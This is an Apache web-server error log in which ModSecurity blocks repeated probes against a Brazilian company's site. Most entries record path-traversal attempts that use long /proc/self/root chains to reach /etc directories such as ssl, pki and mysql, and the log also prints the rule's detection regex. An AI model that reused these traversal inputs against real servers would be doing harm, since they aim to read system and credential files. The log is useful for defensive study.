[Tue Mar 17 16:27:53.523473 2026] [:error] [pid 2598:tid 140411599251200] [client 74.7.241.31:56236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrORj0p0SRWAqcjGGIWQAAAxE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:27:55.861353 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.241.31:56244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrO8U6Sx0TG1YjmQi9UAAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:28:04.121853 2026] [proxy_fcgi:error] [pid 2598:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36806] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:28:07.211513 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:54788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrRxj0p0SRWAqcjGGIXgAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:28:08.912621 2026] [:error] [pid 18380:tid 140411548894976] [client 74.7.241.31:40920] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrSK4xEDsg_V3ESNZaBQAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:28:25.125797 2026] [proxy_fcgi:error] [pid 7004:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37150] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:28:29.403518 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.241.31:40932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrXQeiSKl8TjouI-YmqAAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:28:33.374626 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:51656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrYdY0UrI5A3LftIwL4wAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:28:46.046010 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37490] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:28:56.509699 2026] [:error] [pid 7004:tid 140411557287680] [client 74.7.243.128:33410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrd8U6Sx0TG1YjmQi9dAAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:29:03.084231 2026] [:error] [pid 6296:tid 140411641214720] [client 74.7.244.43:40586] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmrf3Ik7brgkOH-rIWapQAAAUw"]
[Tue Mar 17 16:29:08.149817 2026] [proxy_fcgi:error] [pid 2598:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37874] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:29:17.207410 2026] [:error] [pid 25836:tid 140411641214720] [client 74.7.241.31:51658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrjYh-PF_25v4hFRB50gAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:29:20.131006 2026] [:error] [pid 7004:tid 140411733534464] [client 74.7.241.31:48704] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrkMU6Sx0TG1YjmQi9eQAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:29:20.818296 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:52318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrkNY0UrI5A3LftIwL-gAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:29:22.931474 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.31:48718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrkgeiSKl8TjouI-YmtAAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:29:30.097889 2026] [proxy_fcgi:error] [pid 6296:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38194] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:29:36.435198 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.228.61:45674] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmroMU6Sx0TG1YjmQi9fwAAApQ"]
[Tue Mar 17 16:29:37.342181 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.241.31:48724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmroXIk7brgkOH-rIWatAAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:29:37.935820 2026] [:error] [pid 6296:tid 140411557287680] [client 74.7.241.31:48724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmroXIk7brgkOH-rIWatQAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:29:41.205076 2026] [core:alert] [pid 6296:tid 140411649607424] [client 74.7.243.128:55228] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/lib
[Tue Mar 17 16:29:55.049821 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38532] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:30:19.105882 2026] [proxy_fcgi:error] [pid 29151:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:38918] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:30:20.802880 2026] [:error] [pid 7437:tid 140411616036608] [client 216.73.216.191:15356] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmrzAeiSKl8TjouI-YmwAAAA88"]
[Tue Mar 17 16:30:27.339487 2026] [:error] [pid 19507:tid 140411540502272] [client 216.73.216.191:1087] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmr09Y0UrI5A3LftIwMDQAAAZg"]
[Tue Mar 17 16:30:30.815068 2026] [:error] [pid 6296:tid 140411666392832] [client 216.73.216.191:38973] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmr1nIk7brgkOH-rIWayQAAAUk"]
[Tue Mar 17 16:30:35.055513 2026] [:error] [pid 29151:tid 140411733534464] [client 216.73.216.191:16207] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmr2_PqhzTj3BvfDX-WdgAAAcE"]
[Tue Mar 17 16:30:41.117785 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39406] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:31:03.133509 2026] [proxy_fcgi:error] [pid 6296:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39872] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:31:04.220585 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:56256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmr-Na6ubjKNq_cu4YXLgAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:31:25.126050 2026] [proxy_fcgi:error] [pid 2598:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40362] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:31:47.117832 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40716] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:31:48.131913 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:57274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmsJNa6ubjKNq_cu4YXRQAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:32:10.121771 2026] [proxy_fcgi:error] [pid 19507:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41054] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:32:21.619493 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:44612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmsRdY0UrI5A3LftIwMOAAAAYc"], referer: 